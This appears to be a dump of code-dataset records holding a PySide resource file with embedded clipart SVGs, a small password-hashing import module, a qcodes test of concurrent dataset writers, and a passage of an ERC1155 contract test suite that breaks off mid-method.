LoicBoileau/Projet-S4---Robot-Delta
|
0de0768e2609c18fbf060eb6726150a99080db1c
|
[
"MIT"
] | 56
|
2020-01-15T15:44:40.000Z
|
2021-11-15T17:50:24.000Z
|
python/Lib/site-packages/PySide/examples/desktop/systray/systray_rc.py
|
jfveronelli/sqink
|
5e9e6bc6c5c6c00abbc07099bc1fa1ab6cf79577
|
[
"Unlicense"
] | 4
|
2016-02-01T09:15:05.000Z
|
2020-04-30T03:41:04.000Z
|
# -*- coding: utf-8 -*-
# Resource object code
#
# Created: st 14. 10 21:40:02 2015
# by: The Resource Compiler for PySide (Qt v4.8.7)
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore
qt_resource_data = b"\x00\x00\x0fX<?xml version=\x221.0\x22 encoding=\x22UTF-8\x22 standalone=\x22no\x22?>\x0d\x0a<!-- Created with Inkscape (http://www.inkscape.org/) --><svg viewBox=\x22100 200 550 500\x22 height=\x22841.88976pt\x22 id=\x22svg1\x22 inkscape:version=\x220.40+cvs\x22 sodipodi:docbase=\x22C:\x5cDocuments and Settings\x5cJon Phillips\x5cMy Documents\x5cprojects\x5cclipart-project\x5csubmissions\x22 sodipodi:docname=\x22heart-left-highlight.svg\x22 sodipodi:version=\x220.32\x22 width=\x22595.27559pt\x22 xmlns=\x22http://www.w3.org/2000/svg\x22 xmlns:cc=\x22http://web.resource.org/cc/\x22 xmlns:dc=\x22http://purl.org/dc/elements/1.1/\x22 xmlns:inkscape=\x22http://www.inkscape.org/namespaces/inkscape\x22 xmlns:rdf=\x22http://www.w3.org/1999/02/22-rdf-syntax-ns#\x22 xmlns:sodipodi=\x22http://inkscape.sourceforge.net/DTD/sodipodi-0.dtd\x22 xmlns:svg=\x22http://www.w3.org/2000/svg\x22>\x0d\x0a<metadata>\x0d\x0a<rdf:RDF xmlns:cc=\x22http://web.resource.org/cc/\x22 xmlns:dc=\x22http://purl.org/dc/elements/1.1/\x22 xmlns:rdf=\x22http://www.w3.org/1999/02/22-rdf-syntax-ns#\x22>\x0d\x0a<cc:Work rdf:about=\x22\x22>\x0d\x0a<dc:title>Heart Left-Highlight</dc:title>\x0d\x0a<dc:description>This is a normal valentines day heart.</dc:description>\x0d\x0a<dc:subject>\x0d\x0a<rdf:Bag>\x0d\x0a<rdf:li>holiday</rdf:li>\x0d\x0a<rdf:li>valentines</rdf:li>\x0d\x0a<rdf:li></rdf:li>\x0d\x0a<rdf:li>valentine</rdf:li>\x0d\x0a<rdf:li>hash(0x8a091c0)</rdf:li>\x0d\x0a<rdf:li>hash(0x8a0916c)</rdf:li>\x0d\x0a<rdf:li>signs_and_symbols</rdf:li>\x0d\x0a<rdf:li>hash(0x8a091f0)</rdf:li>\x0d\x0a<rdf:li>day</rdf:li>\x0d\x0a</rdf:Bag>\x0d\x0a</dc:subject>\x0d\x0a<dc:publisher>\x0d\x0a<cc:Agent rdf:about=\x22http://www.openclipart.org\x22>\x0d\x0a<dc:title>Jon Phillips</dc:title>\x0d\x0a</cc:Agent>\x0d\x0a</dc:publisher>\x0d\x0a<dc:creator>\x0d\x0a<cc:Agent>\x0d\x0a<dc:title>Jon 
Phillips</dc:title>\x0d\x0a</cc:Agent>\x0d\x0a</dc:creator>\x0d\x0a<dc:rights>\x0d\x0a<cc:Agent>\x0d\x0a<dc:title>Jon Phillips</dc:title>\x0d\x0a</cc:Agent>\x0d\x0a</dc:rights>\x0d\x0a<dc:date></dc:date>\x0d\x0a<dc:format>image/svg+xml</dc:format>\x0d\x0a<dc:type rdf:resource=\x22http://purl.org/dc/dcmitype/StillImage\x22/>\x0d\x0a<cc:license rdf:resource=\x22http://web.resource.org/cc/PublicDomain\x22/>\x0d\x0a<dc:language>en</dc:language>\x0d\x0a</cc:Work>\x0d\x0a<cc:License rdf:about=\x22http://web.resource.org/cc/PublicDomain\x22>\x0d\x0a<cc:permits rdf:resource=\x22http://web.resource.org/cc/Reproduction\x22/>\x0d\x0a<cc:permits rdf:resource=\x22http://web.resource.org/cc/Distribution\x22/>\x0d\x0a<cc:permits rdf:resource=\x22http://web.resource.org/cc/DerivativeWorks\x22/>\x0d\x0a</cc:License>\x0d\x0a</rdf:RDF>\x0d\x0a</metadata>\x0d\x0a<defs id=\x22defs3\x22/>\x0d\x0a<sodipodi:namedview bordercolor=\x22#666666\x22 borderopacity=\x221.0\x22 id=\x22base\x22 inkscape:current-layer=\x22layer1\x22 inkscape:cx=\x22549.40674\x22 inkscape:cy=\x22596.00159\x22 inkscape:document-units=\x22px\x22 inkscape:guide-bbox=\x22true\x22 inkscape:pageopacity=\x220.0\x22 inkscape:pageshadow=\x222\x22 inkscape:window-height=\x22615\x22 inkscape:window-width=\x22866\x22 inkscape:window-x=\x2288\x22 inkscape:window-y=\x22116\x22 inkscape:zoom=\x220.35000000\x22 pagecolor=\x22#ffffff\x22 showguides=\x22true\x22/>\x0d\x0a<g id=\x22layer1\x22 inkscape:groupmode=\x22layer\x22 inkscape:label=\x22Layer 1\x22>\x0d\x0a<path d=\x22M 263.41570,235.14588 C 197.17570,235.14588 143.41575,288.90587 143.41575,355.14588 C 143.41575,489.90139 279.34890,525.23318 371.97820,658.45392 C 459.55244,526.05056 600.54070,485.59932 600.54070,355.14588 C 600.54070,288.90588 546.78080,235.14587 480.54070,235.14588 C 432.49280,235.14588 391.13910,263.51631 371.97820,304.33338 C 352.81740,263.51630 311.46370,235.14587 263.41570,235.14588 z \x22 id=\x22path7\x22 sodipodi:nodetypes=\x22ccccccc\x22 
style=\x22fill:#e60000;fill-opacity:1.0000000;stroke:#000000;stroke-width:18.700001;stroke-miterlimit:4.0000000;stroke-opacity:1.0000000\x22/>\x0d\x0a<path d=\x22M 265.00000,253.59375 C 207.04033,253.59375 160.00000,300.63407 160.00000,358.59375 C 160.00000,476.50415 278.91857,507.43251 359.96875,624.00000 C 366.52868,614.08205 220.00000,478.47309 220.00000,378.59375 C 220.00000,320.63407 267.04033,273.59375 325.00000,273.59375 C 325.50453,273.59375 325.99718,273.64912 326.50000,273.65625 C 309.22436,261.07286 288.00557,253.59374 265.00000,253.59375 z \x22 id=\x22path220\x22 sodipodi:nodetypes=\x22ccccccc\x22 style=\x22fill:#e6e6e6;fill-opacity:0.64556962;stroke:none;stroke-width:18.700001;stroke-miterlimit:4.0000000;stroke-opacity:1.0000000\x22/>\x0d\x0a</g>\x0d\x0a</svg>\x0d\x0a\x00\x00\x0do<?xml version=\x221.0\x22 encoding=\x22UTF-8\x22 standalone=\x22no\x22?>\x0d\x0a<!DOCTYPE svg PUBLIC \x22-//W3C//DTD SVG 20010904//EN\x22\x0d\x0a\x22http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd\x22>\x0d\x0a<svg viewBox=\x22-10 -10 178 178\x22 height=\x22177.523\x22 id=\x22svg1\x22 inkscape:version=\x220.40\x22 sodipodi:docbase=\x22/mnt/donnees/09-Mes_images/Travaux/Travaux vectoriel/pictogrammes/s\xc3\xa9cu SVG/produits chimiques\x22 sodipodi:docname=\x22XiIrritant.svg\x22 sodipodi:version=\x220.32\x22 width=\x22155.932\x22 xmlns=\x22http://www.w3.org/2000/svg\x22 xmlns:cc=\x22http://web.resource.org/cc/\x22 xmlns:dc=\x22http://purl.org/dc/elements/1.1/\x22 xmlns:inkscape=\x22http://www.inkscape.org/namespaces/inkscape\x22 xmlns:rdf=\x22http://www.w3.org/1999/02/22-rdf-syntax-ns#\x22 xmlns:sodipodi=\x22http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd\x22 xmlns:xlink=\x22http://www.w3.org/1999/xlink\x22>\x0d\x0a<metadata>\x0d\x0a<rdf:RDF xmlns:cc=\x22http://web.resource.org/cc/\x22 xmlns:dc=\x22http://purl.org/dc/elements/1.1/\x22 xmlns:rdf=\x22http://www.w3.org/1999/02/22-rdf-syntax-ns#\x22>\x0d\x0a<cc:Work 
rdf:about=\x22\x22>\x0d\x0a<dc:title>Irritant</dc:title>\x0d\x0a<dc:description>produit chimique</dc:description>\x0d\x0a<dc:subject>\x0d\x0a<rdf:Bag>\x0d\x0a<rdf:li></rdf:li>\x0d\x0a<rdf:li>symbol</rdf:li>\x0d\x0a<rdf:li>signs_and_symbols</rdf:li>\x0d\x0a</rdf:Bag>\x0d\x0a</dc:subject>\x0d\x0a<dc:publisher>\x0d\x0a<cc:Agent rdf:about=\x22http://www.openclipart.org\x22>\x0d\x0a<dc:title>yves GUILLOU</dc:title>\x0d\x0a</cc:Agent>\x0d\x0a</dc:publisher>\x0d\x0a<dc:creator>\x0d\x0a<cc:Agent>\x0d\x0a<dc:title>yves GUILLOU</dc:title>\x0d\x0a</cc:Agent>\x0d\x0a</dc:creator>\x0d\x0a<dc:rights>\x0d\x0a<cc:Agent>\x0d\x0a<dc:title>yves GUILLOU</dc:title>\x0d\x0a</cc:Agent>\x0d\x0a</dc:rights>\x0d\x0a<dc:date></dc:date>\x0d\x0a<dc:format>image/svg+xml</dc:format>\x0d\x0a<dc:type rdf:resource=\x22http://purl.org/dc/dcmitype/StillImage\x22/>\x0d\x0a<cc:license rdf:resource=\x22http://web.resource.org/cc/PublicDomain\x22/>\x0d\x0a<dc:language>en</dc:language>\x0d\x0a</cc:Work>\x0d\x0a<cc:License rdf:about=\x22http://web.resource.org/cc/PublicDomain\x22>\x0d\x0a<cc:permits rdf:resource=\x22http://web.resource.org/cc/Reproduction\x22/>\x0d\x0a<cc:permits rdf:resource=\x22http://web.resource.org/cc/Distribution\x22/>\x0d\x0a<cc:permits rdf:resource=\x22http://web.resource.org/cc/DerivativeWorks\x22/>\x0d\x0a</cc:License>\x0d\x0a</rdf:RDF>\x0d\x0a</metadata>\x0d\x0a<sodipodi:namedview bordercolor=\x22#666666\x22 borderopacity=\x221.0\x22 id=\x22base\x22 inkscape:current-layer=\x22svg1\x22 inkscape:cx=\x2262.372805\x22 inkscape:cy=\x2234.864537\x22 inkscape:pageopacity=\x220.0\x22 inkscape:pageshadow=\x222\x22 inkscape:window-height=\x221121\x22 inkscape:window-width=\x221590\x22 inkscape:window-x=\x22200\x22 inkscape:window-y=\x220\x22 inkscape:zoom=\x226.6399849\x22 pagecolor=\x22#ffffff\x22/>\x0d\x0a<defs id=\x22defs2\x22>\x0d\x0a<marker id=\x22ArrowEnd\x22 markerHeight=\x223\x22 markerUnits=\x22strokeWidth\x22 markerWidth=\x224\x22 orient=\x22auto\x22 refX=\x220\x22 
refY=\x225\x22 viewBox=\x220 0 10 10\x22>\x0d\x0a<path d=\x22M 0 0 L 10 5 L 0 10 z\x22 id=\x22path4\x22/>\x0d\x0a</marker>\x0d\x0a<marker id=\x22ArrowStart\x22 markerHeight=\x223\x22 markerUnits=\x22strokeWidth\x22 markerWidth=\x224\x22 orient=\x22auto\x22 refX=\x2210\x22 refY=\x225\x22 viewBox=\x220 0 10 10\x22>\x0d\x0a<path d=\x22M 10 0 L 0 5 L 10 10 z\x22 id=\x22path6\x22/>\x0d\x0a</marker>\x0d\x0a</defs>\x0d\x0a<g id=\x22g7\x22>\x0d\x0a<g id=\x22g8\x22>\x0d\x0a<path d=\x22M 155.932 155.932L 155.932 0L 0 0L 0 155.932L 155.932 155.932z\x22 id=\x22path9\x22 style=\x22stroke:none; fill:#000000\x22/>\x0d\x0a<path d=\x22M 150.83 150.83L 150.83 5.1011L 5.1011 5.1011L 5.1011 150.83L 150.83 150.83z\x22 id=\x22path10\x22 style=\x22stroke:none; fill:#ff9900\x22/>\x0d\x0a</g>\x0d\x0a<g id=\x22g11\x22>\x0d\x0a<path d=\x22M 140.823 111.783L 44.3677 14.0771L 15.1084 44.1489L 111.564 141.854L 140.823 111.783z\x22 id=\x22path12\x22 style=\x22stroke:none; fill:#000000\x22/>\x0d\x0a<path d=\x22M 111.783 15.1084L 14.0771 111.564L 44.1489 140.823L 141.855 44.3677L 111.783 15.1084z\x22 id=\x22path13\x22 style=\x22stroke:none; fill:#000000\x22/>\x0d\x0a</g>\x0d\x0a</g>\x0d\x0a</svg>\x0d\x0a\x00\x00\x0cz<?xml version=\x221.0\x22 encoding=\x22utf-8\x22?>\x0d\x0a<!-- Generator: Adobe Illustrator 10, SVG Export Plug-In . 
SVG Version: 3.0.0 Build 76) --><svg enable-background=\x22new 0 0 347 348\x22 height=\x22348\x22 i:pageBounds=\x220 792 612 0\x22 i:rulerOrigin=\x220 0\x22 i:viewOrigin=\x22131 567\x22 overflow=\x22visible\x22 space=\x22preserve\x22 viewBox=\x22-20 -20 387 388\x22 width=\x22347\x22 xmlns=\x22http://www.w3.org/2000/svg\x22 xmlns:a=\x22http://ns.adobe.com/AdobeSVGViewerExtensions/3.0/\x22 xmlns:graph=\x22http://ns.adobe.com/Graphs/1.0/\x22 xmlns:i=\x22http://ns.adobe.com/AdobeIllustrator/10.0/\x22 xmlns:x=\x22http://ns.adobe.com/Extensibility/1.0/\x22 xmlns:xlink=\x22http://www.w3.org/1999/xlink\x22>\x0d\x0a<metadata>\x0d\x0a<rdf:RDF xmlns:cc=\x22http://web.resource.org/cc/\x22 xmlns:dc=\x22http://purl.org/dc/elements/1.1/\x22 xmlns:rdf=\x22http://www.w3.org/1999/02/22-rdf-syntax-ns#\x22>\x0d\x0a<cc:Work rdf:about=\x22\x22>\x0d\x0a<dc:title>Keep Tidy Inside</dc:title>\x0d\x0a<dc:description></dc:description>\x0d\x0a<dc:subject>\x0d\x0a<rdf:Bag>\x0d\x0a<rdf:li></rdf:li>\x0d\x0a<rdf:li>symbol</rdf:li>\x0d\x0a<rdf:li>bin</rdf:li>\x0d\x0a<rdf:li>signs_and_symbols</rdf:li>\x0d\x0a<rdf:li>clean</rdf:li>\x0d\x0a<rdf:li>rubish</rdf:li>\x0d\x0a<rdf:li>trash</rdf:li>\x0d\x0a<rdf:li>inside</rdf:li>\x0d\x0a<rdf:li>garbage</rdf:li>\x0d\x0a<rdf:li>sign</rdf:li>\x0d\x0a</rdf:Bag>\x0d\x0a</dc:subject>\x0d\x0a<dc:publisher>\x0d\x0a<cc:Agent rdf:about=\x22http://www.openclipart.org\x22>\x0d\x0a<dc:title>Martin Owens</dc:title>\x0d\x0a</cc:Agent>\x0d\x0a</dc:publisher>\x0d\x0a<dc:creator>\x0d\x0a<cc:Agent>\x0d\x0a<dc:title>Martin Owens</dc:title>\x0d\x0a</cc:Agent>\x0d\x0a</dc:creator>\x0d\x0a<dc:rights>\x0d\x0a<cc:Agent>\x0d\x0a<dc:title>Martin Owens</dc:title>\x0d\x0a</cc:Agent>\x0d\x0a</dc:rights>\x0d\x0a<dc:date></dc:date>\x0d\x0a<dc:format>image/svg+xml</dc:format>\x0d\x0a<dc:type rdf:resource=\x22http://purl.org/dc/dcmitype/StillImage\x22/>\x0d\x0a<cc:license 
rdf:resource=\x22http://web.resource.org/cc/PublicDomain\x22/>\x0d\x0a<dc:language>en</dc:language>\x0d\x0a</cc:Work>\x0d\x0a<cc:License rdf:about=\x22http://web.resource.org/cc/PublicDomain\x22>\x0d\x0a<cc:permits rdf:resource=\x22http://web.resource.org/cc/Reproduction\x22/>\x0d\x0a<cc:permits rdf:resource=\x22http://web.resource.org/cc/Distribution\x22/>\x0d\x0a<cc:permits rdf:resource=\x22http://web.resource.org/cc/DerivativeWorks\x22/>\x0d\x0a</cc:License>\x0d\x0a</rdf:RDF>\x0d\x0a</metadata>\x0d\x0a<g i:dimmedPercent=\x2250\x22 i:knockout=\x22Off\x22 i:layer=\x22yes\x22 i:rgbTrio=\x22#4F008000FFFF\x22 id=\x22Layer_1\x22>\x0d\x0a<path d=\x22M347,174c0,96.098-77.679,174-173.5,174C77.679,348,0,270.098,0,174 C0,77.902,77.679,0,173.5,0C269.321,0,347,77.902,347,174z\x22 fill=\x22#10A040\x22 i:knockout=\x22Off\x22/>\x0d\x0a<path d=\x22M238,53c0,13.807-11.864,25-26.5,25S185,66.807,185,53s11.864-25,26.5-25 S238,39.193,238,53z\x22 fill=\x22#FFFFFF\x22 i:knockout=\x22Off\x22/>\x0d\x0a<path d=\x22M66,175c1.055,6.355,19.333,126.417,19.333,126.417h68.333 c0,0,14.105-122.524,14.333-126.417c6.224-0.622,6.667-13-2-13c-12.164,0-89.205-0.059-98,0S61.167,174.487,66,175z\x22 fill=\x22#FFFFFF\x22 i:knockout=\x22Off\x22/>\x0d\x0a<path d=\x22M78,141c17.292-5.325,24.179-23.532,27-31c14.513,6.596,40.333,12.265,59,8 c3.683,19.419-28.043,19.31-23,37C132.577,145.705,89.404,167.292,78,141z\x22 fill=\x22#FFFFFF\x22 i:knockout=\x22Off\x22/>\x0d\x0a<path d=\x22M103,82l139-1c-0.6,3.421,33.633,57.497,29,67c-4.089,0.418-67,5-67,5 c6.109-9.379-13-43-13-43L103,82z\x22 fill=\x22#FFFFFF\x22 i:knockout=\x22Off\x22/>\x0d\x0a<path d=\x22M270,156l-66-3c0,0-23.565,143.355-24,145s1.855,2.536,3,1s51-82,51-82 s19.754,80.701,20,82s3.721,1.209,4,0S270,156,270,156z\x22 fill=\x22#FFFFFF\x22 i:knockout=\x22Off\x22/>\x0d\x0a</g>\x0d\x0a</svg>\x0d\x0a"
qt_resource_name = b"\x00\x06\x07\x03}\xc3\x00i\x00m\x00a\x00g\x00e\x00s\x00\x09\x08\x97\x87\xa7\x00h\x00e\x00a\x00r\x00t\x00.\x00s\x00v\x00g\x00\x07\x08wZ\x07\x00b\x00a\x00d\x00.\x00s\x00v\x00g\x00\x09\x08\x9b\xad\xc7\x00t\x00r\x00a\x00s\x00h\x00.\x00s\x00v\x00g"
qt_resource_struct = b"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\x00\x00\x00*\x00\x00\x00\x00\x00\x01\x00\x00\x0f\x5c\x00\x00\x00\x12\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x01\x00\x00\x1c\xcf"
def qInitResources():
    """Register the embedded resource data with Qt's resource system."""
    QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
    """Unregister the embedded resource data from Qt's resource system."""
    QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| 631.681818
| 12,848
| 0.756998
| 2,626
| 13,897
| 3.996192
| 0.239909
| 0.101201
| 0.051458
| 0.023061
| 0.623118
| 0.608443
| 0.581189
| 0.558796
| 0.538403
| 0.519154
| 0
| 0.241891
| 0.034972
| 13,897
| 21
| 12,849
| 661.761905
| 0.540601
| 0.013096
| 0
| 0
| 0
| 0.333333
| 0.973371
| 0.510615
| 0
| 0
| 0.002553
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.111111
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a780e92d5f42551f4db213a60c42a54b15f9ad37
| 131
|
py
|
Python
|
sales_register/adapters/password_hashing/__init__.py
|
tamercuba/purchase-system
|
cfd3e4fecbd96c130f620d11491fa14979c0d996
|
[
"MIT"
] | null | null | null |
sales_register/adapters/password_hashing/__init__.py
|
tamercuba/purchase-system
|
cfd3e4fecbd96c130f620d11491fa14979c0d996
|
[
"MIT"
] | 6
|
2021-05-15T21:44:19.000Z
|
2021-05-23T22:20:13.000Z
|
sales_register/adapters/password_hashing/__init__.py
|
tamercuba/sales-register
|
cfd3e4fecbd96c130f620d11491fa14979c0d996
|
[
"MIT"
] | null | null | null |
from adapters.password_hashing.context import pwd_context
from adapters.password_hashing.implementation import PasswordHashManager
| 43.666667
| 72
| 0.908397
| 15
| 131
| 7.733333
| 0.6
| 0.206897
| 0.344828
| 0.465517
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.061069
| 131
| 2
| 73
| 65.5
| 0.943089
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 9
|
a7abb77a880cfb53a1dd237f5cf8e5526d35a432
| 2,067
|
py
|
Python
|
qcodes/tests/dataset/test_concurrent_datasets.py
|
riju-pal/QCoDeS_riju
|
816e76809160e9af457f6ef6d4aca1b0dd5eea82
|
[
"MIT"
] | 223
|
2016-10-29T15:00:24.000Z
|
2022-03-20T06:53:34.000Z
|
qcodes/tests/dataset/test_concurrent_datasets.py
|
M1racleShih/Qcodes
|
c03029a6968e16379155aadc8b083a02e01876a6
|
[
"MIT"
] | 3,406
|
2016-10-25T10:44:50.000Z
|
2022-03-31T09:47:35.000Z
|
qcodes/tests/dataset/test_concurrent_datasets.py
|
nikhartman/Qcodes
|
042c5e25ab9e40b20c316b4055c4842844834d1e
|
[
"MIT"
] | 263
|
2016-10-25T11:35:36.000Z
|
2022-03-31T08:53:20.000Z
|
"""
Test that multiple datasets can coexist as expected
"""
import pytest
from qcodes import new_experiment
from qcodes.dataset.data_set import DataSet
def test_foreground_after_background_raises(empty_temp_db_connection):
    """Starting a foreground dataset after a background one raises RuntimeError."""
    new_experiment("test", "test1", conn=empty_temp_db_connection)

    background_ds = DataSet(conn=empty_temp_db_connection)
    background_ds.mark_started(start_bg_writer=True)

    foreground_ds = DataSet(conn=empty_temp_db_connection)
    with pytest.raises(RuntimeError, match="All datasets written"):
        foreground_ds.mark_started(start_bg_writer=False)
def test_background_after_foreground_raises(empty_temp_db_connection):
    """Starting a background dataset after a foreground one raises RuntimeError."""
    new_experiment("test", "test1", conn=empty_temp_db_connection)

    foreground_ds = DataSet(conn=empty_temp_db_connection)
    foreground_ds.mark_started(start_bg_writer=False)

    background_ds = DataSet(conn=empty_temp_db_connection)
    with pytest.raises(RuntimeError, match="All datasets written"):
        background_ds.mark_started(start_bg_writer=True)
def test_background_twice(empty_temp_db_connection):
    """Two datasets may both be started with a background writer."""
    new_experiment("test", "test1", conn=empty_temp_db_connection)

    first_ds = DataSet(conn=empty_temp_db_connection)
    first_ds.mark_started(start_bg_writer=True)

    second_ds = DataSet(conn=empty_temp_db_connection)
    second_ds.mark_started(start_bg_writer=True)
def test_foreground_twice(empty_temp_db_connection):
    """Two datasets may both be started with a foreground writer."""
    new_experiment("test", "test1", conn=empty_temp_db_connection)

    first_ds = DataSet(conn=empty_temp_db_connection)
    first_ds.mark_started(start_bg_writer=False)

    second_ds = DataSet(conn=empty_temp_db_connection)
    second_ds.mark_started(start_bg_writer=False)
def test_foreground_after_background_non_concurrent(empty_temp_db_connection):
    """Alternating writer modes works when each dataset completes before the next starts."""
    new_experiment("test", "test1", conn=empty_temp_db_connection)

    # Same sequence as the original: background, foreground, background —
    # each fully completed before the next one is started.
    for use_bg_writer in (True, False, True):
        ds = DataSet(conn=empty_temp_db_connection)
        ds.mark_started(start_bg_writer=use_bg_writer)
        ds.mark_completed()
| 33.885246
| 78
| 0.789066
| 293
| 2,067
| 5.146758
| 0.16041
| 0.125332
| 0.153183
| 0.29244
| 0.846817
| 0.809019
| 0.769231
| 0.767241
| 0.767241
| 0.740053
| 0
| 0.016556
| 0.123367
| 2,067
| 60
| 79
| 34.45
| 0.815673
| 0.024673
| 0
| 0.675
| 0
| 0
| 0.042331
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.075
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a7c347653d1e57c8c3f27fad261db49a3f17e415
| 60,907
|
py
|
Python
|
tests/test_packages/test_contracts/test_erc1155/test_contract.py
|
bryanchriswhite/agents-aea
|
d3f177a963eb855d9528555167255bf2b478f4ba
|
[
"Apache-2.0"
] | 126
|
2019-09-07T09:32:44.000Z
|
2022-03-29T14:28:41.000Z
|
tests/test_packages/test_contracts/test_erc1155/test_contract.py
|
salman6049/agents-aea
|
d3f177a963eb855d9528555167255bf2b478f4ba
|
[
"Apache-2.0"
] | 1,814
|
2019-08-24T10:08:07.000Z
|
2022-03-31T14:28:36.000Z
|
tests/test_packages/test_contracts/test_erc1155/test_contract.py
|
salman6049/agents-aea
|
d3f177a963eb855d9528555167255bf2b478f4ba
|
[
"Apache-2.0"
] | 46
|
2019-09-03T22:13:58.000Z
|
2022-03-22T01:25:16.000Z
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2020 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""The tests module contains the tests of the packages/contracts/erc1155 dir."""
import re
import time
from pathlib import Path
from typing import cast
from unittest import mock
import pytest
from aea_ledger_ethereum import EthereumCrypto
from aea_ledger_fetchai import FetchAIApi, FetchAICrypto
from aea.configurations.loader import (
ComponentType,
ContractConfig,
load_component_configuration,
)
from aea.contracts.base import Contract, contract_registry
from aea.test_tools.test_contract import BaseContractTestCase
from tests.conftest import (
ETHEREUM_ADDRESS_ONE,
ETHEREUM_ADDRESS_TWO,
ETHEREUM_PRIVATE_KEY_PATH,
ETHEREUM_PRIVATE_KEY_TWO_PATH,
ETHEREUM_TESTNET_CONFIG,
FETCHAI_TESTNET_CONFIG,
MAX_FLAKY_RERUNS,
ROOT_DIR,
UseGanache,
)
@pytest.mark.ledger
class TestERC1155ContractEthereum(BaseContractTestCase, UseGanache):
    """Test the ERC1155 contract on Ethereum (runs against a local Ganache node)."""

    # Deploy using the Ethereum ledger/crypto pair; the contract package under test
    # lives in packages/fetchai/contracts/erc1155.
    ledger_identifier = EthereumCrypto.identifier
    path_to_contract = Path(ROOT_DIR, "packages", "fetchai", "contracts", "erc1155")

    @classmethod
    def setup(cls):
        """Set up the test case: deploy the contract and prepare test token ids."""
        super().setup(
            ledger_config=ETHEREUM_TESTNET_CONFIG,
            deployer_private_key_path=ETHEREUM_PRIVATE_KEY_PATH,
            item_owner_private_key_path=ETHEREUM_PRIVATE_KEY_TWO_PATH,
        )
        # Ten ids of token type 1 (NFTs): (1 << 128) .. (1 << 128) + 9.
        # The token type is encoded in the high bits of the id — see test_decode_id.
        cls.token_ids_a = [
            340282366920938463463374607431768211456,
            340282366920938463463374607431768211457,
            340282366920938463463374607431768211458,
            340282366920938463463374607431768211459,
            340282366920938463463374607431768211460,
            340282366920938463463374607431768211461,
            340282366920938463463374607431768211462,
            340282366920938463463374607431768211463,
            340282366920938463463374607431768211464,
            340282366920938463463374607431768211465,
        ]
        # A single id of token type 2 (FT): 2 << 128.
        cls.token_id_b = 680564733841876926926749214863536422912

    @classmethod
    def finish_contract_deployment(cls) -> str:
        """
        Finish deploying contract.

        :return: contract address
        """
        contract_address = cls.ledger_api.get_contract_address(
            cls.deployment_tx_receipt
        )
        if contract_address is None:
            raise ValueError("Contract address not found!")  # pragma: nocover
        return contract_address

    def test_generate_token_ids(self):
        """Test the generate_token_ids method of the ERC1155 contract."""
        # setup
        nft_token_type = 1
        nb_tokens = 2
        expected_toke_ids = [
            340282366920938463463374607431768211456,
            340282366920938463463374607431768211457,
        ]
        # operation
        actual_toke_ids = self.contract.generate_token_ids(nft_token_type, nb_tokens)
        # after
        assert actual_toke_ids == expected_toke_ids

    def test_generate_id(self):
        """Test the _generate_id method of the ERC1155 contract."""
        # setup
        ft_token_type = 2
        index = 0
        expected_toke_id = 680564733841876926926749214863536422912
        # operation
        actual_toke_id = self.contract._generate_id(index, ft_token_type)
        # after
        assert actual_toke_id == expected_toke_id

    def test_get_create_batch_transaction(self):
        """Test the get_create_batch_transaction method of the ERC1155 contract."""
        # operation
        tx = self.contract.get_create_batch_transaction(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            deployer_address=self.deployer_crypto.address,
            token_ids=self.token_ids_a,
        )
        # after
        assert len(tx) == 7
        assert all(
            key in tx
            for key in ["value", "chainId", "gas", "gasPrice", "nonce", "to", "data"]
        )
        self.sign_send_confirm_receipt_multisig_transaction(
            tx, self.ledger_api, [self.deployer_crypto]
        )

    def test_get_create_single_transaction(self):
        """Test the get_create_single_transaction method of the ERC1155 contract."""
        # operation
        tx = self.contract.get_create_single_transaction(
            ledger_api=self.ledger_api,
            contract_address=self.contract_address,
            deployer_address=self.deployer_crypto.address,
            token_id=self.token_id_b,
        )
        # after
        assert len(tx) == 7
        assert all(
            key in tx
            for key in ["value", "chainId", "gas", "gasPrice", "nonce", "to", "data"]
        )
        self.sign_send_confirm_receipt_multisig_transaction(
            tx, self.ledger_api, [self.deployer_crypto]
        )

    def test_get_mint_batch_transaction(self):
        """Test the get_mint_batch_transaction method of the ERC1155 contract."""
        # operation
